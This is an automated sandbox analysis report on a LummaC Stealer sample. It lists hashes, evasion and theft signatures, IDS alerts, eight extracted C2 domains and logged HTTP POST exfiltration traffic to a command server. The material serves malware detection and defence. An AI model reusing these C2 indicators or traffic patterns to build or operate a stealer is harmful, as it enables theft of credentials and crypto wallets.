Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(2).exe

Overview

General Information

Sample name:random(2).exe
Analysis ID:1629897
MD5:4c7602a935a7b24e6262acd38505eb9a
SHA1:e1e15c5e8c053eb523ffeb3a24bbe857e41db489
SHA256:57ccc2313dbc37566c73b42a74283f967d0502a60d276a90afa1dfbee6a74aff
Tags:176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • random(2).exe (PID: 6644 cmdline: "C:\Users\user\Desktop\random(2).exe" MD5: 4C7602A935A7B24E6262ACD38505EB9A)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["dawtastream.bet", "foresctwhispers.top", "tracnquilforest.life", "collapimga.fun", "seizedsentec.online", "strawpeasaen.fun", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "tw1SlF--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.955773+010020283713Unknown Traffic192.168.2.749700104.21.64.1443TCP
                2025-03-05T09:16:55.745350+010020283713Unknown Traffic192.168.2.749701104.21.64.1443TCP
                2025-03-05T09:16:58.994747+010020283713Unknown Traffic192.168.2.749703104.21.64.1443TCP
                2025-03-05T09:17:00.218797+010020283713Unknown Traffic192.168.2.749709104.21.64.1443TCP
                2025-03-05T09:17:02.544617+010020283713Unknown Traffic192.168.2.749725104.21.64.1443TCP
                2025-03-05T09:17:19.514053+010020283713Unknown Traffic192.168.2.749834104.21.64.1443TCP
                2025-03-05T09:17:20.952254+010020283713Unknown Traffic192.168.2.749844104.21.64.1443TCP
                2025-03-05T09:17:22.981179+010020283713Unknown Traffic192.168.2.749857104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:55.204960+010020546531A Network Trojan was detected192.168.2.749700104.21.64.1443TCP
                2025-03-05T09:16:57.213059+010020546531A Network Trojan was detected192.168.2.749701104.21.64.1443TCP
                2025-03-05T09:17:23.479116+010020546531A Network Trojan was detected192.168.2.749857104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:55.204960+010020498361A Network Trojan was detected192.168.2.749700104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.955773+010020604131Domain Observed Used for C2 Detected192.168.2.749700104.21.64.1443TCP
                2025-03-05T09:16:55.745350+010020604131Domain Observed Used for C2 Detected192.168.2.749701104.21.64.1443TCP
                2025-03-05T09:16:58.994747+010020604131Domain Observed Used for C2 Detected192.168.2.749703104.21.64.1443TCP
                2025-03-05T09:17:00.218797+010020604131Domain Observed Used for C2 Detected192.168.2.749709104.21.64.1443TCP
                2025-03-05T09:17:02.544617+010020604131Domain Observed Used for C2 Detected192.168.2.749725104.21.64.1443TCP
                2025-03-05T09:17:19.514053+010020604131Domain Observed Used for C2 Detected192.168.2.749834104.21.64.1443TCP
                2025-03-05T09:17:20.952254+010020604131Domain Observed Used for C2 Detected192.168.2.749844104.21.64.1443TCP
                2025-03-05T09:17:22.981179+010020604131Domain Observed Used for C2 Detected192.168.2.749857104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.124936+010020604101Domain Observed Used for C2 Detected192.168.2.7622231.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.432215+010020604121Domain Observed Used for C2 Detected192.168.2.7629801.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.075836+010020604141Domain Observed Used for C2 Detected192.168.2.7615791.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.396054+010020604161Domain Observed Used for C2 Detected192.168.2.7560901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.268847+010020604181Domain Observed Used for C2 Detected192.168.2.7571901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.415778+010020604201Domain Observed Used for C2 Detected192.168.2.7505061.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.372742+010020604221Domain Observed Used for C2 Detected192.168.2.7623491.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:54.101743+010020604241Domain Observed Used for C2 Detected192.168.2.7500231.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-05T09:16:59.557880+010020480941Malware Command and Control Activity Detected192.168.2.749703104.21.64.1443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: random(2).exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://earthsymphzony.today:443/apiAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apiEMAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apiVAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/aAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/mAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today:443/api&Avira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apiAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/bAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/Avira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/api288Avira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apijAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/a$Avira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apiyAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apicAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apixAvira URL Cloud: Label: malware
                Source: dawtastream.betAvira URL Cloud: Label: malware
                Source: https://earthsymphzony.today/apimeAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["dawtastream.bet", "foresctwhispers.top", "tracnquilforest.life", "collapimga.fun", "seizedsentec.online", "strawpeasaen.fun", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "tw1SlF--"}
                Multi AV Scanner detection for submitted file
                Source: random(2).exeVirustotal: Detection: 56%Perma Link
                Source: random(2).exeReversingLabs: Detection: 55%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dawtastream.bet
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: foresctwhispers.top
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tracnquilforest.life
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: collapimga.fun
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: seizedsentec.online
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: strawpeasaen.fun
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: quietswtreams.life
                Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: starrynsightsky.icu
                Source: random(2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49844 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49857 version: TLS 1.2
                Source: C:\Users\user\Desktop\random(2).exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2060414 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top) : 192.168.2.7:61579 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060418 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online) : 192.168.2.7:57190 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun) : 192.168.2.7:62223 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49703 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49709 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49725 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49701 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060412 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today) : 192.168.2.7:62980 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060424 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life) : 192.168.2.7:50023 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060422 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun) : 192.168.2.7:62349 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.7:50506 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060416 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life) : 192.168.2.7:56090 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49844 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49700 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49857 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2060413 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (earthsymphzony .today in TLS SNI) : 192.168.2.7:49834 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49703 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49857 -> 104.21.64.1:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: dawtastream.bet
                Source: Malware configuration extractorURLs: foresctwhispers.top
                Source: Malware configuration extractorURLs: tracnquilforest.life
                Source: Malware configuration extractorURLs: collapimga.fun
                Source: Malware configuration extractorURLs: seizedsentec.online
                Source: Malware configuration extractorURLs: strawpeasaen.fun
                Source: Malware configuration extractorURLs: quietswtreams.life
                Source: Malware configuration extractorURLs: starrynsightsky.icu
                Source: global trafficTCP traffic: 192.168.2.7:57927 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49844 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49857 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49834 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CH331FBUMJ1XCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=707WPNS1QCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 6646Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9WX7PLJNJ0A4ZCCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20374Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EBABCEGLZCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2301Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4A1W8BCUKKMJ7AS22FCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584009Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: earthsymphzony.today
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: dawtastream.bet
                Source: global trafficDNS traffic detected: DNS query: foresctwhispers.top
                Source: global trafficDNS traffic detected: DNS query: tracnquilforest.life
                Source: global trafficDNS traffic detected: DNS query: collapimga.fun
                Source: global trafficDNS traffic detected: DNS query: seizedsentec.online
                Source: global trafficDNS traffic detected: DNS query: strawpeasaen.fun
                Source: global trafficDNS traffic detected: DNS query: quietswtreams.life
                Source: global trafficDNS traffic detected: DNS query: starrynsightsky.icu
                Source: global trafficDNS traffic detected: DNS query: earthsymphzony.today
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: earthsymphzony.today
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Mar 2025 08:16:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BpIJ7uHiYcbFeSVzk5TM%2FSWipGNSxmX95z2h%2B0awfae1lON3g7XOHooiqwUXW0mqL%2FaMu2z0oZz%2BnaZKZAGPCQ%2FVfq9wwEFSrSXBXyc5NbNEaqIYuFIMJojFSU98pKzObnRFOMXKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91b82c88ab50c358-EWR
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://x1.c.lencr.org/0
                Source: random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drString found in binary or memory: http://x1.i.lencr.org/0
                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sf
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
